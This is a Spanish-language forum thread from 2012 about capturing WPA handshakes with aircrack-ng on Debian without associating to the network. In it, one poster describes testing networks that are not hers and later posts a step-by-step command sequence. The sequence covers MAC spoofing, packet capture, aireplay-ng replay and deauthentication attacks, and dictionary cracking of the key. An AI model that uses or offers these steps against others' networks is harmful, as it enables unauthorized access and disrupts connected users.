Foro de elhacker.net

Seguridad Informática => Wireless en Linux => Mensaje iniciado por: Jenag en 31 Julio 2012, 21:21 pm



Título: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 31 Julio 2012, 21:21 pm
Me ha pasado una cosa muy curiosa , auditando mi propia red desde debian con aircrack-ng , en 6 minutos he conseguido el handshake , sin estar asociada a la red.¿Esto es posible?. :-*

Pd : Me tiene desconcertada , sin estar asociada. :-*


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: hacelo en 2 Agosto 2012, 16:12 pm
Hola.
Con esta captura de la imagen me pasa lo mismo que a tí.
Algunas veces estoy probando el aircrack-ng en wifi-way y sin estar asociado a ninguna red me arroja el handshake de la  d-link.
Yo, la verdad no se por que hace esto. Pero si te fijas, también me aparece una en el CH133 como comentaste tú en algún otro post.
Quizás sea esto bastante común......... :-\
Haber si algún especialista en la matería nos comenta algo sobre este asunto. :silbar:


(http://img577.imageshack.us/img577/4013/forogd.png)


Saludos.



Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 2 Agosto 2012, 16:49 pm
Citar
Pero si te fijas, también me aparece una en el CH133 como comentaste tú en algún otro post.
Quizás sea esto bastante común......... :-\
Haber si algún especialista en la matería nos comenta algo sobre este asunto
Sí es curioso , haber si alguien se anima y aporta datos sobre estos temas. :-*

Pd : Hice pruebas en redes que no eran mias y sin asociación me conseguia el handshake , tranquil@s que no le voy a robar la red a nadie , sólo es estudio. :-*


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: P4nd3m0n1um en 2 Agosto 2012, 18:34 pm
coinsido pero ojo.. sera uno verdadero?

ya que puede pasarbq te de al toke pero nunca encontraras la clave.


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 2 Agosto 2012, 19:18 pm
Citar
coinsido pero ojo.. sera uno verdadero?
P4nd3m0n1um , coincides pero ¿será uno verdadero?.¿A qué te refieres?.Puede que haya sido falseado.No entiendo.

Citar
ya que puede pasarbq te de al toke pero nunca encontraras la clave.
¿Y por qué dices que jamás encontraré la clave?.De 6 handshakes no consigo 5 de 6 pero he sacado la clave de 1 y tranquilo que no le voy a robar la red a nadie , las primeras auditorias fue contra mi propia red , la de las otras redes era por curiosidad de no estar asociada. :-*


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 2 Agosto 2012, 20:46 pm
He descifrado el handshake y la password abre la red.Instrucciones a seguir :
Citar
Paso 1 : ifconfig wlan1 down hw ether xx:xx:xx:xx:xx:xx
ifconfig wlan1 up
airmon-ng start wlan1
airodump-ng mon0      ## todos.         
airodump-ng --bssid xx:xx:xx:xx:xx:xx --channel 1 mon0    ## sólo uno.
Citar
Paso 2 : airodump-ng -c 1 --bssid xx:xx:xx:xx:xx:xx -w Eva mon0
Citar
Paso 3 : aireplay-ng -3 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e x mon0
Citar
Paso 4 : aireplay-ng -5 -D -j -o 0 -q 600 -g 600 -x 1024 -b xx:xx:xx:xx:xx:xx -h xx:xx:xx:xx:xx:xx -e x mon0
Citar
Paso 5 : aireplay-ng --deauth 6 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
Citar
Paso 6 : aircrack-ng -z xx:xx:xx:xx:xx:xx *.cap o aircrack-ng -w /home/Jenag/.Root/.pass/Eva.lst *.cap

Sín estar asociada handshake real.Explícalo mejor P4nd3m0n1um.Las preguntas de arriba.. :-*


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 4 Agosto 2012, 23:25 pm
P4nd3m0n1um , no te olvides de las preguntas y dudas que te hago arriba. :-*


Título: Re: Otra consultilla , auditando con aircrack-ng desde debian.
Publicado por: Jenag en 16 Agosto 2012, 11:01 am
P4nd3m0n1um , coincides pero ¿será uno verdadero?.¿A qué te refieres?.Puede que haya sido falseado.No entiendo.
¿Y por qué dices que jamás encontraré la clave?.De 6 handshakes no consigo 5 de 6 pero he sacado la clave de 1 y tranquilo que no le voy a robar la red a nadie , las primeras auditorias fue contra mi propia red , la de las otras redes era por curiosidad de no estar asociada. :-*
Tranquilo P4nd3m0n1um el tema lo puedo dar por solucionado ya voy entendiendo algunas cosas.Gracias por tu orientación y ayuda. :-*